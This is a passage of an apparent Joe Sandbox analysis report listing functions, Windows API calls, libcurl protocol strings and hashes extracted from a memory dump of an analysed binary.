    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 0068B6EA
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068B70E
    • sendto.WS2_32(?,?,00000004,00000000,-000000C8,?), ref: 0068B7EB
    • WSAGetLastError.WS2_32(?,00000080), ref: 0068B80F
    • sendto.WS2_32(?,?,00000004,00000000,-000000C8,?), ref: 0068B99B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068B9DC
    Strings
    • Received last DATA packet block %d again., xrefs: 0068B64B
    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 0068B885
    • Received unexpected DATA packet block %d, expecting block %d, xrefs: 0068B673
    • tftp_rx: internal error, xrefs: 0068B9B3
    Similarity
    • API ID: sendto$ErrorLast$CheckStackVars@8
    • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
    Similarity
    • API ID: _memcmp$CheckStackVars@8_strlen
    • String ID: @$AUTH $Remote access denied: %d$SIZE$STARTTLS$STARTTLS not supported.$Unexpectedly short EHLO response
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: : %ld$CSeq:$CSeq:$Got RTSP Session ID Line [%s], but wanted ID [%s]$Got a blank Session ID$Session:$Session:$Unable to read the CSeq header: [%s]
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: ?????$?????$?????
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
      • Part of subcall function 006B4650: @_RTC_CheckStackVars@8.LIBCMT ref: 006B4748
    Similarity
    • API ID: CheckStackVars@8
    • String ID: $@$AUTH %s$AUTH %s$CCC$Failed to clear the command channel (CCC)$Got a %03d ftp-server response when 220 was expected$P$PROT %c$unsupported parameter to CURLOPT_FTPSSLAUTH: %d
    APIs
    • _free.LIBCMT ref: 006E0D72
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006E0D84
    • _free.LIBCMT ref: 006E0D96
    • _free.LIBCMT ref: 006E0DA8
    • _free.LIBCMT ref: 006E0DBA
    • _free.LIBCMT ref: 006E0DCC
    • _free.LIBCMT ref: 006E0DDE
    • _free.LIBCMT ref: 006E0DF0
    • _free.LIBCMT ref: 006E0E02
    • _free.LIBCMT ref: 006E0E14
    • _free.LIBCMT ref: 006E0E26
    • _free.LIBCMT ref: 006E0E38
    • _free.LIBCMT ref: 006E0E4A
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    APIs
    • _strlen.LIBCMT ref: 00694631
    • _memcmp.LIBVCRUNTIME ref: 00694657
    • _memcmp.LIBVCRUNTIME ref: 00694680
    • _memcmp.LIBVCRUNTIME ref: 006946B5
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00694895
    Similarity
    • API ID: _memcmp$CheckStackVars@8_strlen
    • String ID: +$@$SASL $STLS$STLS not supported.$USER
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006BBE8D
    Similarity
    • API ID: CheckStackVars@8
    • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00680062
    • ___from_strstr_to_strchr.LIBCMT ref: 006801CB
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
    Similarity
    • API ID: Getcvt
    • String ID: ?qo$false$true
    APIs
    • _free.LIBCMT ref: 006E1A96
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0D72
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0D84
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0D96
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DA8
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DBA
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DCC
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DDE
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0DF0
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E02
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E14
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E26
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E38
      • Part of subcall function 006E0D55: _free.LIBCMT ref: 006E0E4A
    • _free.LIBCMT ref: 006E1AB8
    • _free.LIBCMT ref: 006E1ACD
    • _free.LIBCMT ref: 006E1AD8
    • _free.LIBCMT ref: 006E1AFA
    • _free.LIBCMT ref: 006E1B0D
    • _free.LIBCMT ref: 006E1B1B
    • _free.LIBCMT ref: 006E1B26
    • _free.LIBCMT ref: 006E1B5E
    • _free.LIBCMT ref: 006E1B65
    • _free.LIBCMT ref: 006E1B82
    • _free.LIBCMT ref: 006E1B9A
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    APIs
      • Part of subcall function 006D82D3: CreateFileW.KERNEL32(00000000,00000000,?,006D86DB,?,?,00000000,?,006D86DB,00000000,0000000C), ref: 006D82F0
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006D8746
    • __dosmaperr.LIBCMT ref: 006D874D
    • GetFileType.KERNEL32(00000000), ref: 006D8759
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006D8763
    • __dosmaperr.LIBCMT ref: 006D876C
    • CloseHandle.KERNEL32(00000000), ref: 006D878C
    • CloseHandle.KERNEL32(?), ref: 006D88D9
    • GetLastError.KERNEL32 ref: 006D890B
    • __dosmaperr.LIBCMT ref: 006D8912
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
    • String ID: H
    • API String ID: 4237864984-2852464175
    • Opcode ID: 7097fd566ed1b47a1e58b0aba817356eb6a8b673b85402bbe28d227801b7f560
    • Instruction ID: 5579dd7368af06f02433b559f00e051ff9b4dacf47b9439c01bdc3a58456c186
    • Opcode Fuzzy Hash: 7097fd566ed1b47a1e58b0aba817356eb6a8b673b85402bbe28d227801b7f560
    • Instruction Fuzzy Hash: F3A10631E041499FCF199FA8DC55BAE3BA2AB06320F24415EF811AF391DF349D16CB95
    APIs
    • _strstr.LIBCMT ref: 0069E755
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E9F2
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen$_strstr
    • String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$N$RETR response: %03d$}
    • API String ID: 2009688273-937278969
    • Opcode ID: 020ff9cdf8fb3be227d15c4c1efa666f17784bb8eaea450a4309a23c28078120
    • Instruction ID: a3d5d7447b6c42cfe018b233873d04217722e3ba152dce13114e03c55daf4ebf
    • Opcode Fuzzy Hash: 020ff9cdf8fb3be227d15c4c1efa666f17784bb8eaea450a4309a23c28078120
    • Instruction Fuzzy Hash: 9BB12BB4E00208DFDF14CF98C885AEDBBB6BF48314F14826DE9156B791D736AA41CB91
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00673B05
      • Part of subcall function 00670630: _strlen.LIBCMT ref: 0067067A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %s$100-continue$Content-Length$Content-Length: %I64d$Content-Length: 0$Expect$Expect:$Failed sending POST request$Failed sending POST request
    • API String ID: 1951014933-28685619
    • Opcode ID: 171202b4b8bb00c834428f014ae32a9f1b964a2a4c675aeb96a654aa13b3983a
    • Instruction ID: 276c1a727abb33aafa51d1100a719ac6d972f13d1625fc8809455120bd479db3
    • Opcode Fuzzy Hash: 171202b4b8bb00c834428f014ae32a9f1b964a2a4c675aeb96a654aa13b3983a
    • Instruction Fuzzy Hash: FFA1BC70E04318EBDB14DB94C886BEDB7B2AF44314F14C2A8E529AB382D7759B85DF50
    APIs
    • CertGetNameStringA.CRYPT32(00000000,00000006,00010000,00000000,00000000,00000000), ref: 006B0B3C
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 006B0CBE
    • schannel: CertGetNameString() returned no certificate name information, xrefs: 006B0B52
    • <, xrefs: 006B0CB4
    • schannel: server certificate name verification failed, xrefs: 006B0CD7
    • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 006B0C6D
    • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 006B0C4B
    • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 006B0BC8
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CertCheckNameStackStringVars@8_strlen
    • String ID: <$schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
    • API String ID: 454863901-1025306730
    • Opcode ID: 143b828e81231e633e6801ab6eed002529888e3be87fc8a17c8e48b64ac58488
    • Instruction ID: 80bf0cffd50074c28d8799db1a0760df450abb89990cf96858c81a45ef2a09c1
    • Opcode Fuzzy Hash: 143b828e81231e633e6801ab6eed002529888e3be87fc8a17c8e48b64ac58488
    • Instruction Fuzzy Hash: 3B611AF1D00209EFEB44DF94C846BEFBBB6AF48304F108659E514BB240D775AA85CB95
    APIs
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 006ACE2A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006ACECA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s$%s%02x%02x$CNAME: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $TTL: %u seconds$v$xvp
    • API String ID: 3286693010-2184722941
    • Opcode ID: 6ad73c3f6eecfa0db97295174f67a11bca6d8e11704f4a52f9bf92fd54f0a1cc
    • Instruction ID: cb1f64864b2cf80746dd3f51debec2cf9040a3bd417207c03a6675724ebe45f4
    • Opcode Fuzzy Hash: 6ad73c3f6eecfa0db97295174f67a11bca6d8e11704f4a52f9bf92fd54f0a1cc
    • Instruction Fuzzy Hash: 4B616EB5E04218AFCB14DF58C891BADB7B6FF86304F10C1A9E4095B282D775AE85CF91
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: NTLM$NTLM$NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected$?g$?g
    • API String ID: 4218353326-1235922430
    • Opcode ID: 3f060a6e3d495b26cc41a77d4464020f931679497c9895d917d969a90a0ec01a
    • Instruction ID: 74905ee81d2fd278c82fb2442e36c92d0724c4cdf9672bf90935b26532819041
    • Opcode Fuzzy Hash: 3f060a6e3d495b26cc41a77d4464020f931679497c9895d917d969a90a0ec01a
    • Instruction Fuzzy Hash: F8516DF4A00249AFDB04EF54CC51AAE7BB2BF86305F144068E8159B341E7B5EE50CFA1
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 0346f03d68d41d5866db273b9a4a4be0d65601a1e54cdd7fd82286ca5d13a027
    • Instruction ID: c9e1c965e542bfbb2ef30eb697d31ca750799f1315be9d070388825f5367d3c6
    • Opcode Fuzzy Hash: 0346f03d68d41d5866db273b9a4a4be0d65601a1e54cdd7fd82286ca5d13a027
    • Instruction Fuzzy Hash: 82C14572D40244AFDB60DBA8DC82FDEB7F9AF09B04F144169FA05FB382D67099419B64
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066372C
      • Part of subcall function 0066D3E0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0067E522,?), ref: 0066D412
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D434
      • Part of subcall function 0066D3E0: __allrem.LIBCMT ref: 0066D454
      • Part of subcall function 0066D3E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D477
      • Part of subcall function 0066D3E0: @_RTC_CheckStackVars@8.LIBCMT ref: 0066D4E3
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • WSASetLastError.WS2_32(00000000), ref: 00663520
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006635BF
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    • Connection time-out, xrefs: 00663161
    • Failed to connect to %s port %ld: %s, xrefs: 006636F8
    • connect to %s port %ld failed: %s, xrefs: 0066357E
    • Connection failed, xrefs: 006634CF
    • L', xrefs: 0066328E
    • After %I64dms connect time, move on!, xrefs: 0066327D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$Unothrow_t@std@@@__ehfuncinfo$??2@$_strlen$CounterErrorLastPerformanceQuery__allrem
    • String ID: After %I64dms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$L'$connect to %s port %ld failed: %s
    • API String ID: 3383922131-68081636
    • Opcode ID: fca23368ddbf0aff51ed7b680e307e90d80d31526b4715accd9d0b0e40860427
    • Instruction ID: 51ffbb5e5aea5833fa2ae2cceb1deea8be4e399b6a412afcc0b271de4910d486
    • Opcode Fuzzy Hash: fca23368ddbf0aff51ed7b680e307e90d80d31526b4715accd9d0b0e40860427
    • Instruction Fuzzy Hash: 6B224D74A00218EFDB54DF58D885BEDBBB2BF49314F1481A9E9099B341D735AE81CF90
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: $%02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$;$<$F
    • API String ID: 1951014933-625890780
    • Opcode ID: 01aa9424150ee9a1a665d588d34ca9ca816830047ec451a17fae715b275b618c
    • Instruction ID: 9e96600507ce5407847db4caf5abf3b3ac45c5819391b66d4cd25923efa19046
    • Opcode Fuzzy Hash: 01aa9424150ee9a1a665d588d34ca9ca816830047ec451a17fae715b275b618c
    • Instruction Fuzzy Hash: E51217B0D00619CBDF24CFA8D8507EDBBB2AF45334F24826EE469A7291D7309A81CF51
    APIs
    • select.WS2_32(FFFFFFFE,00000000,00000000,00000000,?), ref: 00667907
    • WSAGetLastError.WS2_32 ref: 0066792A
    • __WSAFDIsSet.WS2_32(00000000,00000000), ref: 00667A74
    • __WSAFDIsSet.WS2_32(00000000,00000000), ref: 00667AB2
    • __WSAFDIsSet.WS2_32(00000000,00000000), ref: 00667AEE
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00667B4E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorLastStackVars@8select
    • String ID: @$@$@
    • API String ID: 1206456650-1177533131
    • Opcode ID: 33df4ed2c9c4a8f5231200815412bcaf58306d977e8d84244947b242bd133fd7
    • Instruction ID: 200b6f0e7ca2a8bee2090cfba1f4247083c6e1f92b8358342ef9fb765352d950
    • Opcode Fuzzy Hash: 33df4ed2c9c4a8f5231200815412bcaf58306d977e8d84244947b242bd133fd7
    • Instruction Fuzzy Hash: F322F974904218DBDB6ACF18C895BA9B7BAFB48318F1082D9E459A7351D731AFD1CF80
    APIs
      • Part of subcall function 00683780: @_RTC_CheckStackVars@8.LIBCMT ref: 00683995
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006985A0
    Strings
    • Request has same path as previous transfer, xrefs: 00698566
    • Uploading to a URL without a file name!, xrefs: 00698461
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
    • API String ID: 930174750-131330169
    • Opcode ID: 40bee42b9f5ddae507ec9103cda53aeb05d2dad3b20a8b944f5689a3e20d78ed
    • Instruction ID: 497f6b7e4ed32997951a845314bc31926d22a2c4995f8d07a01ac74f37e49852
    • Opcode Fuzzy Hash: 40bee42b9f5ddae507ec9103cda53aeb05d2dad3b20a8b944f5689a3e20d78ed
    • Instruction Fuzzy Hash: C5F154B0E002189FCF14DF98D885BEEB7B6BF49304F148169E9156B341DB35AE86CB91
    APIs
    • htons.WS2_32(?), ref: 00689A65
    • htons.WS2_32(?), ref: 00689A83
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00689D5F
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    • Sending data failed (%d), xrefs: 00689D44
    • Sending data failed (%d), xrefs: 00689CCC
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Stackhtons$CheckFailureVars@8
    • String ID: Sending data failed (%d)$Sending data failed (%d)
    • API String ID: 2853669374-2562922721
    • Opcode ID: 69d63edbdecc276c8897a80854ac7a3974d69c19c9c3db66a11fa86ccc913722
    • Instruction ID: 8f7c02e11469170e0a8a163efdec300f3e57739c69665109a9c666b6a7e51aba
    • Opcode Fuzzy Hash: 69d63edbdecc276c8897a80854ac7a3974d69c19c9c3db66a11fa86ccc913722
    • Instruction Fuzzy Hash: 2ED1F974A152949FCB08DB98D891EEFB7B3BF84344F1843A8F8056B391D771A841CB94
    APIs
    • getpeername.WS2_32(0065A2D0,?,00000080), ref: 00664142
    • WSAGetLastError.WS2_32 ref: 00664155
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00664339
    Strings
    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00664310
    • getsockname() failed with errno %d: %s, xrefs: 0066421E
    • getpeername() failed with errno %d: %s, xrefs: 0066418B
    • ssrem inet_ntop() failed with errno %d: %s, xrefs: 0066428A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorLastStackVars@8getpeername
    • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
    • API String ID: 1334586172-670633250
    • Opcode ID: 803975fc8344bf724deba68754fd1f04b2b4d30c7024c4d0cb9201f9ac8d8fdb
    • Instruction ID: 8346e64ade3560fcc708c134eab3f22092673243b1b28fcb6a2cba8a7cfdf492
    • Opcode Fuzzy Hash: 803975fc8344bf724deba68754fd1f04b2b4d30c7024c4d0cb9201f9ac8d8fdb
    • Instruction Fuzzy Hash: 5061B5B2A00214AFDB54EB54EC52FEE777BAF45304F40819CF949AB242DE349E448BE5
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006785A8
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006785ED
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678670
